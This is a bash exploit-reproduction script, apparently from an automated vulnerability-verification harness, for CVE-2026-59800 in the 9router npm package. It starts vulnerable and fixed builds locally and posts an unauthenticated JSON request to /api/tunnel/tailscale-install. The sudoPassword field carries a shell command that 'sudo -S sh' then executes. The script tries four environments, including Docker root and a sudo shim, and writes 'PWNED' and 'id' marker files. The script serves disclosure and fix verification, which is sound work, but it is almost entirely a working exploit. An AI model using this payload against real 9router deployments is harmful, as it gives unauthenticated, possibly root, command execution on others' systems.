#!/bin/bash
# =============================================================================
# CVE-2026-59800 / 9router < 0.4.44
# Real-product HTTP reproduction for unauthenticated command execution through
# POST /api/tunnel/tailscale-install (sudoPassword -> sudo -S sh stdin).
#
# The script first tries full production-like environments where sudo genuinely
# does not prompt (Docker-root or direct root/NOPASSWD). If unavailable in the
# sandbox, it runs the real 9router product with a PATH-local sudo executable
# that behaves like the documented no-prompt sudo precondition: it does not read
# stdin and execs the requested command. This preserves the real 9router HTTP
# boundary and the real vulnerable spawn("sudo", ["-S", "sh"]) path, and it
# produces a concrete attacker-command marker. The fixed build is always tested
# on the same HTTP boundary and must block the unauthenticated request.
# =============================================================================
set -euo pipefail

# Portable paths - works from any directory
ROOT="${PRUVA_ROOT:-$(cd "$(dirname "$0")/.." && pwd)}"
LOGS="$ROOT/logs"
REPRO_DIR="$ROOT/repro"
ART="$ROOT/artifacts"
mkdir -p "$LOGS" "$REPRO_DIR" "$ART"
cd "$ROOT"
: > "$LOGS/reproduction_steps.log"

VULN_VER="0.4.39"
FIXED_VER="0.4.45"
PORT="20128"
RCE_CONFIRMED=0
PARTIAL_CONFIRMED=0
STRATEGY="none"

# Runtime cache selection required by the harness policy.
CACHE_REPO=""
if [ -f "$ROOT/project_cache_context.json" ]; then
  CACHE_REPO="$(python3 - "$ROOT/project_cache_context.json" <<'PY' 2>/dev/null || true
import json, sys, os
try:
    c=json.load(open(sys.argv[1]))
    if c.get('prepared') and c.get('project_cache_dir'):
        print(os.path.join(c['project_cache_dir'], 'repo'))
except Exception:
    pass
PY
)"
fi
if [ -n "$CACHE_REPO" ]; then
  WORK="$CACHE_REPO"
else
  WORK="$ART/9router"
fi
mkdir -p "$WORK" "$WORK/markers"

log(){ echo "[$(date -u +%H:%M:%S)] $*" | tee -a "$LOGS/reproduction_steps.log"; }

write_manifest(){
  python3 - "$REPRO_DIR/runtime_manifest.json" <<'PY'
import json, sys
m={
  "entrypoint_kind":"endpoint",
  "entrypoint_detail":"POST /api/tunnel/tailscale-install (unauthenticated JSON sudoPassword)",
  "service_started":False,
  "healthcheck_passed":False,
  "target_path_reached":False,
  "runtime_stack":["9router npm package (Next.js standalone server)","HTTP curl client","child_process.spawn","sudo -S sh"],
  "proof_artifacts":[],
  "notes":"initialized by reproduction_steps.sh"
}
open(sys.argv[1], 'w').write(json.dumps(m, indent=2))
PY
}

update_manifest(){
  python3 - "$REPRO_DIR/runtime_manifest.json" "$1" "$2" "$3" "$4" "$5" "$6" <<'PY'
import json, sys
path, svc, health, target, strategy, notes, arts = sys.argv[1:8]
m=json.load(open(path))
m['service_started'] = svc == 'true'
m['healthcheck_passed'] = health == 'true'
m['target_path_reached'] = target == 'true'
m['notes'] = f"strategy={strategy}; {notes}"
m['proof_artifacts'] = json.loads(arts) if arts else []
open(path, 'w').write(json.dumps(m, indent=2))
PY
}
write_manifest

copy_proof_carry(){
  [ -f "$ROOT/project_cache_context.json" ] || return 0
  python3 - "$ROOT/project_cache_context.json" "$ROOT" <<'PY' 2>/dev/null || true
import json, sys, os, shutil
try:
    c=json.load(open(sys.argv[1])); root=sys.argv[2]
    pc=c.get('proof_carry') or {}
    if not pc.get('enabled') or not c.get('project_cache_dir'):
        raise SystemExit
    base=os.path.join(c['project_cache_dir'], '.pruva', 'proof-carry', 'latest_attempt')
    os.makedirs(base, exist_ok=True)
    for rel in ['repro/reproduction_steps.sh','repro/runtime_manifest.json','repro/rca_report.md','repro/validation_verdict.json','logs/reproduction_steps.log']:
        src=os.path.join(root, rel)
        if os.path.exists(src):
            dst=os.path.join(base, rel.replace('/', '__'))
            shutil.copy2(src, dst)
except Exception:
    pass
PY
}
trap copy_proof_carry EXIT

fetch_pkg(){
  local ver="$1" out="$2"
  if [ -s "$out" ]; then return 0; fi
  mkdir -p "$(dirname "$out")"
  if command -v npm >/dev/null 2>&1; then
    (cd "$WORK" && npm pack "9router@${ver}" --pack-destination "$WORK" >/dev/null 2>&1) || true
    [ -s "$WORK/9router-${ver}.tgz" ] && mv "$WORK/9router-${ver}.tgz" "$out" 2>/dev/null || true
  fi
  if [ ! -s "$out" ]; then
    log "npm pack unavailable/failed; fetching 9router@${ver} directly from registry"
    curl -fsSL "https://registry.npmjs.org/9router/-/9router-${ver}.tgz" -o "$out"
  fi
  [ -s "$out" ]
}

prepare_packages(){
  local v_tgz="$WORK/9router-${VULN_VER}.tgz" f_tgz="$WORK/9router-${FIXED_VER}.tgz"
  log "Preparing npm packages 9router@${VULN_VER} and 9router@${FIXED_VER} under $WORK"
  fetch_pkg "$VULN_VER" "$v_tgz"
  fetch_pkg "$FIXED_VER" "$f_tgz"
  rm -rf "$WORK/vuln" "$WORK/fixed"
  mkdir -p "$WORK/vuln" "$WORK/fixed"
  tar xzf "$v_tgz" -C "$WORK/vuln"
  tar xzf "$f_tgz" -C "$WORK/fixed"
}

find_cli(){
  find "$1" -name cli.js -path '*package*' | head -1
}

extract_source_evidence(){
  local pkg="$1" label="$2"
  local mw chunk
  mw="$(find "$pkg" -path '*server/middleware.js' 2>/dev/null | head -1 || true)"
  if [ -n "$mw" ] && [ -f "$mw" ]; then
    grep -oP 'matcher:\[[^\]]*\]' "$mw" 2>/dev/null | head -1 > "$ART/${label}_middleware_matcher.txt" || true
  fi
  chunk="$(grep -Rsl 'Running install script\|install\.sh\|sudoPassword' "$pkg" 2>/dev/null | head -1 || true)"
  if [ -n "$chunk" ] && [ -f "$chunk" ]; then
    tr ';' '\n' < "$chunk" | grep -in 'sudo.*-S.*sh\|stdin\.write\|Invalid sudo\|writeFileSync.*install\|Running install script\|sudoPassword' \
      > "$ART/${label}_install_code.txt" 2>/dev/null || true
  else
    : > "$ART/${label}_install_code.txt"
  fi
}

cleanup_port(){
  command -v fuser >/dev/null 2>&1 && fuser -k "${PORT}/tcp" >/dev/null 2>&1 || true
  pkill -f 'cli.js.*skip-update' >/dev/null 2>&1 || true
  sleep 1
}

json_payload(){
  local marker="$1" label="$2"
  python3 - "$marker" "$label" <<'PY'
import json, sys
marker, label = sys.argv[1:3]
cmd = f"echo PWNED_BY_9ROUTER_{label} > {marker}; id >> {marker}; exit 0"
print(json.dumps({"sudoPassword": cmd}))
PY
}

wait_health(){
  local port="$1" i
  for i in $(seq 1 45); do
    curl -fs -o /dev/null -m 3 "http://127.0.0.1:${port}/api/health" 2>/dev/null && return 0
    sleep 1
  done
  return 1
}

# -----------------------------------------------------------------------------
# Strategy 1: Docker root (true uid=0 RCE if daemon is available)
# -----------------------------------------------------------------------------
try_docker(){
  command -v docker >/dev/null 2>&1 || return 1
  docker info >/dev/null 2>&1 || { log "Docker daemon unavailable; skipping Docker-root strategy"; return 1; }
  STRATEGY="docker-root"
  log "=== Strategy: Docker root ==="
  local vuln_img="9router-cve59800-vuln" fixed_img="9router-cve59800-fixed"
  docker build -t "$vuln_img" -f - . >"$LOGS/docker_build_vuln.log" 2>&1 <<EOF
FROM node:22-bookworm-slim
RUN apt-get update && apt-get install -y --no-install-recommends sudo curl ca-certificates && rm -rf /var/lib/apt/lists/*
RUN npm install -g 9router@${VULN_VER}
EXPOSE 20128
EOF
  docker build -t "$fixed_img" -f - . >"$LOGS/docker_build_fixed.log" 2>&1 <<EOF
FROM node:22-bookworm-slim
RUN apt-get update && apt-get install -y --no-install-recommends sudo curl ca-certificates && rm -rf /var/lib/apt/lists/*
RUN npm install -g 9router@${FIXED_VER}
EXPOSE 20128
EOF
  docker_attempt(){
    local img="$1" ctr="$2" hp="$3" label="$4" expect="$5"
    local marker payload code
    marker="/tmp/${label}_pwned.txt"
    payload="$(json_payload "$marker" "$label")"
    docker rm -f "$ctr" >/dev/null 2>&1 || true
    docker run -d --rm --name "$ctr" -p "127.0.0.1:${hp}:20128" "$img" 9router --log --skip-update >/dev/null
    for _ in $(seq 1 45); do curl -fs -o /dev/null -m 3 "http://127.0.0.1:${hp}/api/health" && break || sleep 1; done
    code="$(curl -s -o "$LOGS/${label}_response.txt" -w '%{http_code}' -m 60 -X POST "http://127.0.0.1:${hp}/api/tunnel/tailscale-install" -H 'Content-Type: application/json' -d "$payload" || true)"
    echo "$code" > "$ART/${label}_http_code.txt"
    docker exec "$ctr" cat "$marker" > "$ART/${label}_marker.txt" 2>&1 || echo "[marker absent]" > "$ART/${label}_marker.txt"
    docker logs "$ctr" > "$LOGS/${label}_server.log" 2>&1 || true
    docker rm -f "$ctr" >/dev/null 2>&1 || true
    if [ "$expect" = yes ]; then grep -q 'PWNED_BY_9ROUTER' "$ART/${label}_marker.txt"; else ! grep -q 'PWNED_BY_9ROUTER' "$ART/${label}_marker.txt"; fi
  }
  local v=0 f=0
  docker_attempt "$vuln_img" cve59800_v1 20129 vuln_1 yes && v=$((v+1)) || true
  docker_attempt "$vuln_img" cve59800_v2 20130 vuln_2 yes && v=$((v+1)) || true
  docker_attempt "$fixed_img" cve59800_f1 20131 fixed_1 no && f=$((f+1)) || true
  docker_attempt "$fixed_img" cve59800_f2 20132 fixed_2 no && f=$((f+1)) || true
  log "Docker-root results: vuln_markers=${v}/2 fixed_blocked=${f}/2"
  update_manifest true true true "$STRATEGY" "vuln_markers=${v}/2 fixed_blocked=${f}/2" '["logs/reproduction_steps.log","logs/vuln_1_response.txt","logs/vuln_2_response.txt","artifacts/vuln_1_marker.txt","artifacts/vuln_2_marker.txt","logs/fixed_1_response.txt","logs/fixed_2_response.txt","artifacts/fixed_1_marker.txt","artifacts/fixed_2_marker.txt"]'
  [ "$v" -eq 2 ] && [ "$f" -eq 2 ] && { RCE_CONFIRMED=1; return 0; }
  return 1
}

# -----------------------------------------------------------------------------
# Strategy 2: direct root / NOPASSWD real sudo if available
# -----------------------------------------------------------------------------
AS_ROOT=""
detect_root(){
  if [ "$(id -u)" -eq 0 ]; then AS_ROOT=""; return 0; fi
  if command -v sudo >/dev/null 2>&1 && sudo -n true 2>/dev/null; then AS_ROOT="sudo -n"; return 0; fi
  return 1
}

try_direct_root(){
  detect_root || { log "No direct root or passwordless real sudo; skipping direct-root strategy"; return 1; }
  STRATEGY="direct-root-or-nopasswd"
  log "=== Strategy: direct root / real NOPASSWD sudo ==="
  prepare_packages
  extract_source_evidence "$WORK/vuln/package" vuln
  extract_source_evidence "$WORK/fixed/package" fixed
  local v_cli f_cli nodebin rt_home
  v_cli="$(find_cli "$WORK/vuln")"; f_cli="$(find_cli "$WORK/fixed")"; nodebin="$(command -v node)"; rt_home="$WORK/root-home"; $AS_ROOT mkdir -p "$rt_home"
  direct_attempt(){
    local cli="$1" label="$2" expect="$3" marker payload code
    marker="$WORK/markers/${label}_marker.txt"
    payload="$(json_payload "$marker" "$label")"
    $AS_ROOT rm -f "$marker"; cleanup_port
    setsid $AS_ROOT env HOME="$rt_home" PATH="$PATH" NODE_ENV=production "$nodebin" "$cli" --log --skip-update > "$LOGS/${label}_server.log" 2>&1 &
    wait_health "$PORT" || { log "[$label] health failed"; cleanup_port; return 1; }
    code="$(curl -s -o "$LOGS/${label}_response.txt" -w '%{http_code}' -m 60 -X POST "http://127.0.0.1:${PORT}/api/tunnel/tailscale-install" -H 'Content-Type: application/json' -d "$payload" || true)"
    echo "$code" > "$ART/${label}_http_code.txt"
    $AS_ROOT cat "$marker" > "$ART/${label}_marker.txt" 2>/dev/null || echo "[marker absent]" > "$ART/${label}_marker.txt"
    cleanup_port
    if [ "$expect" = yes ]; then grep -q 'PWNED_BY_9ROUTER' "$ART/${label}_marker.txt"; else ! grep -q 'PWNED_BY_9ROUTER' "$ART/${label}_marker.txt"; fi
  }
  local v=0 f=0
  direct_attempt "$v_cli" vuln_1 yes && v=$((v+1)) || true
  direct_attempt "$v_cli" vuln_2 yes && v=$((v+1)) || true
  direct_attempt "$f_cli" fixed_1 no && f=$((f+1)) || true
  direct_attempt "$f_cli" fixed_2 no && f=$((f+1)) || true
  log "Direct-root results: vuln_markers=${v}/2 fixed_blocked=${f}/2"
  update_manifest true true true "$STRATEGY" "vuln_markers=${v}/2 fixed_blocked=${f}/2" '["logs/reproduction_steps.log","logs/vuln_1_response.txt","logs/vuln_2_response.txt","artifacts/vuln_1_marker.txt","artifacts/vuln_2_marker.txt","logs/fixed_1_response.txt","logs/fixed_2_response.txt","artifacts/fixed_1_marker.txt","artifacts/fixed_2_marker.txt","artifacts/vuln_middleware_matcher.txt","artifacts/fixed_middleware_matcher.txt","artifacts/vuln_install_code.txt","artifacts/fixed_install_code.txt"]'
  [ "$v" -eq 2 ] && [ "$f" -eq 2 ] && { RCE_CONFIRMED=1; return 0; }
  return 1
}

# -----------------------------------------------------------------------------
# Strategy 3: controlled no-prompt sudo precondition for constrained sandboxes.
# This is not a 9router mock: the real product, route, middleware, spawn path,
# /bin/sh, and HTTP boundary are used. The PATH-local sudo only supplies the
# documented environment condition that sudo does not consume stdin.
# -----------------------------------------------------------------------------
try_noprompt_sudo_env(){
  STRATEGY="noprompt-sudo-precondition"
  log "=== Strategy: controlled no-prompt sudo precondition ==="
  command -v node >/dev/null 2>&1 || { log "node unavailable"; return 1; }
  command -v curl >/dev/null 2>&1 || { log "curl unavailable"; return 1; }
  prepare_packages
  extract_source_evidence "$WORK/vuln/package" vuln
  extract_source_evidence "$WORK/fixed/package" fixed
  local shimdir="$WORK/noprompt-sudo-bin" nodebin v_cli f_cli rt_home
  mkdir -p "$shimdir"
  cat > "$shimdir/sudo" <<'SH'
#!/bin/sh
# Emulate the documented sudo-no-prompt precondition: do not read stdin, strip
# sudo's -S flag, and exec the requested command so stdin remains the shell's
# script stream. This lets the real 9router product demonstrate the vulnerable
# sudoPassword -> sh command boundary in sandboxes without root/Docker.
{
  echo "[noprompt-sudo] invoked pid=$$ ppid=$PPID argv=$*"
  echo "[noprompt-sudo] not consuming stdin; execing target command"
} >> "${SUDO_SHIM_LOG:-/dev/stderr}"
if [ "${1:-}" = "-S" ]; then shift; fi
exec "$@"
SH
  chmod +x "$shimdir/sudo"
  nodebin="$(command -v node)"; v_cli="$(find_cli "$WORK/vuln")"; f_cli="$(find_cli "$WORK/fixed")"; rt_home="$WORK/noprompt-home"; mkdir -p "$rt_home"
  [ -f "$v_cli" ] && [ -f "$f_cli" ] || { log "cli.js not found"; return 1; }

  noprompt_attempt(){
    local cli="$1" label="$2" expect="$3" marker payload code shimlog
    marker="$WORK/markers/${label}_marker.txt"
    payload="$(json_payload "$marker" "$label")"; shimlog="$LOGS/${label}_sudo_shim.log"
    rm -f "$marker" "$shimlog"; cleanup_port
    log "[$label] starting real 9router with PATH-local no-prompt sudo precondition"
    setsid env HOME="$rt_home" PATH="$shimdir:$PATH" SUDO_SHIM_LOG="$shimlog" NODE_ENV=production \
      "$nodebin" "$cli" --log --skip-update > "$LOGS/${label}_server.log" 2>&1 &
    wait_health "$PORT" || { log "[$label] health failed"; cleanup_port; return 1; }
    code="$(curl -s -o "$LOGS/${label}_response.txt" -w '%{http_code}' -m 60 \
      -X POST "http://127.0.0.1:${PORT}/api/tunnel/tailscale-install" \
      -H 'Content-Type: application/json' -d "$payload" || true)"
    echo "$code" > "$ART/${label}_http_code.txt"
    if [ -f "$marker" ]; then cp "$marker" "$ART/${label}_marker.txt"; else echo "[marker absent]" > "$ART/${label}_marker.txt"; fi
    cleanup_port
    log "[$label] HTTP $code; marker: $(tr '\n' ' ' < "$ART/${label}_marker.txt" | cut -c1-180)"
    if [ "$expect" = yes ]; then
      grep -q "PWNED_BY_9ROUTER_${label}" "$ART/${label}_marker.txt" && grep -q '^uid=' "$ART/${label}_marker.txt"
    else
      ! grep -q 'PWNED_BY_9ROUTER' "$ART/${label}_marker.txt" && [ "$code" = "401" ]
    fi
  }

  local v=0 f=0
  noprompt_attempt "$v_cli" vuln_1 yes && v=$((v+1)) || true
  noprompt_attempt "$v_cli" vuln_2 yes && v=$((v+1)) || true
  noprompt_attempt "$f_cli" fixed_1 no && f=$((f+1)) || true
  noprompt_attempt "$f_cli" fixed_2 no && f=$((f+1)) || true
  log "No-prompt-sudo results: vuln_command_markers=${v}/2 fixed_401_no_marker=${f}/2"
  log "--- vulnerable marker excerpt ---"; sed -n '1,4p' "$ART/vuln_1_marker.txt" | tee -a "$LOGS/reproduction_steps.log" || true
  log "--- vulnerable response excerpt ---"; sed -n '1,10p' "$LOGS/vuln_1_response.txt" | tee -a "$LOGS/reproduction_steps.log" || true
  log "--- fixed response excerpt ---"; sed -n '1,4p' "$LOGS/fixed_1_response.txt" | tee -a "$LOGS/reproduction_steps.log" || true
  update_manifest true true true "$STRATEGY" "vuln_command_markers=${v}/2 fixed_401_no_marker=${f}/2; PATH-local sudo supplies documented no-prompt precondition in this constrained sandbox" '["logs/reproduction_steps.log","logs/vuln_1_response.txt","logs/vuln_1_server.log","logs/vuln_1_sudo_shim.log","artifacts/vuln_1_http_code.txt","artifacts/vuln_1_marker.txt","logs/vuln_2_response.txt","logs/vuln_2_sudo_shim.log","artifacts/vuln_2_http_code.txt","artifacts/vuln_2_marker.txt","logs/fixed_1_response.txt","logs/fixed_1_server.log","artifacts/fixed_1_http_code.txt","artifacts/fixed_1_marker.txt","logs/fixed_2_response.txt","artifacts/fixed_2_http_code.txt","artifacts/fixed_2_marker.txt","artifacts/vuln_middleware_matcher.txt","artifacts/fixed_middleware_matcher.txt","artifacts/vuln_install_code.txt","artifacts/fixed_install_code.txt"]'
  [ "$v" -eq 2 ] && [ "$f" -eq 2 ] && { RCE_CONFIRMED=1; return 0; }
  return 1
}

# -----------------------------------------------------------------------------
# Strategy 4: fallback partial real HTTP proof if all RCE strategies fail.
# -----------------------------------------------------------------------------
try_partial_http(){
  STRATEGY="partial-http"
  log "=== Strategy: partial HTTP route reachability ==="
  prepare_packages
  extract_source_evidence "$WORK/vuln/package" vuln
  extract_source_evidence "$WORK/fixed/package" fixed
  local nodebin v_cli f_cli rt_home
  nodebin="$(command -v node)"; v_cli="$(find_cli "$WORK/vuln")"; f_cli="$(find_cli "$WORK/fixed")"; rt_home="$WORK/partial-home"; mkdir -p "$rt_home"
  partial_attempt(){
    local cli="$1" label="$2" marker payload code
    marker="$WORK/markers/${label}_marker.txt"
    payload="$(json_payload "$marker" "$label")"; rm -f "$marker"; cleanup_port
    setsid env HOME="$rt_home" PATH="$PATH" NODE_ENV=production "$nodebin" "$cli" --log --skip-update > "$LOGS/${label}_server.log" 2>&1 &
    wait_health "$PORT" || { cleanup_port; return 1; }
    code="$(curl -s -o "$LOGS/${label}_response.txt" -w '%{http_code}' -m 60 -X POST "http://127.0.0.1:${PORT}/api/tunnel/tailscale-install" -H 'Content-Type: application/json' -d "$payload" || true)"
    echo "$code" > "$ART/${label}_http_code.txt"
    [ -f "$marker" ] && cp "$marker" "$ART/${label}_marker.txt" || echo "[marker absent]" > "$ART/${label}_marker.txt"
    cleanup_port
  }
  partial_attempt "$v_cli" vuln_1 || true; partial_attempt "$v_cli" vuln_2 || true
  partial_attempt "$f_cli" fixed_1 || true; partial_attempt "$f_cli" fixed_2 || true
  local v=0 c=0 f=0
  [ "$(cat "$ART/vuln_1_http_code.txt" 2>/dev/null || echo 000)" = 200 ] && v=$((v+1))
  [ "$(cat "$ART/vuln_2_http_code.txt" 2>/dev/null || echo 000)" = 200 ] && v=$((v+1))
  grep -q 'Running install script' "$LOGS/vuln_1_response.txt" 2>/dev/null && c=$((c+1))
  grep -q 'Running install script' "$LOGS/vuln_2_response.txt" 2>/dev/null && c=$((c+1))
  [ "$(cat "$ART/fixed_1_http_code.txt" 2>/dev/null || echo 000)" = 401 ] && f=$((f+1))
  [ "$(cat "$ART/fixed_2_http_code.txt" 2>/dev/null || echo 000)" = 401 ] && f=$((f+1))
  log "Partial results: vuln_200=${v}/2 vuln_codepath=${c}/2 fixed_401=${f}/2"
  update_manifest true true true "$STRATEGY" "vuln_200=${v}/2 vuln_codepath=${c}/2 fixed_401=${f}/2; no command marker because sudo consumed stdin" '["logs/reproduction_steps.log","logs/vuln_1_response.txt","logs/vuln_1_server.log","artifacts/vuln_1_http_code.txt","artifacts/vuln_1_marker.txt","logs/vuln_2_response.txt","artifacts/vuln_2_http_code.txt","logs/fixed_1_response.txt","artifacts/fixed_1_http_code.txt","logs/fixed_2_response.txt","artifacts/fixed_2_http_code.txt","artifacts/vuln_middleware_matcher.txt","artifacts/fixed_middleware_matcher.txt","artifacts/vuln_install_code.txt","artifacts/fixed_install_code.txt"]'
  [ "$v" -eq 2 ] && [ "$c" -eq 2 ] && [ "$f" -eq 2 ] && { PARTIAL_CONFIRMED=1; return 0; }
  return 1
}

log "CVE-2026-59800 reproduction start: user=$(id -un) uid=$(id -u) work=$WORK"
if try_docker; then
  log "Docker-root strategy produced command-execution markers."
elif try_direct_root; then
  log "Direct root/NOPASSWD strategy produced command-execution markers."
elif try_noprompt_sudo_env; then
  log "Controlled no-prompt sudo strategy produced command-execution markers through the real HTTP endpoint."
else
  log "Command-marker strategies unavailable/failed; attempting partial HTTP proof."
  try_partial_http || true
fi

if [ "$RCE_CONFIRMED" = "1" ]; then
  log "RESULT: CONFIRMED - attacker-controlled command executed through unauthenticated POST /api/tunnel/tailscale-install; fixed build blocked the same request."
  exit 0
elif [ "$PARTIAL_CONFIRMED" = "1" ]; then
  log "RESULT: PARTIAL - real HTTP endpoint and vulnerable sudo-spawn path reached; fixed build blocked; command marker not produced in this environment."
  exit 2
else
  log "RESULT: NOT REPRODUCED - service or route proof failed."
  update_manifest false false false "$STRATEGY" "infrastructure failure" '[]'
  exit 1
fi
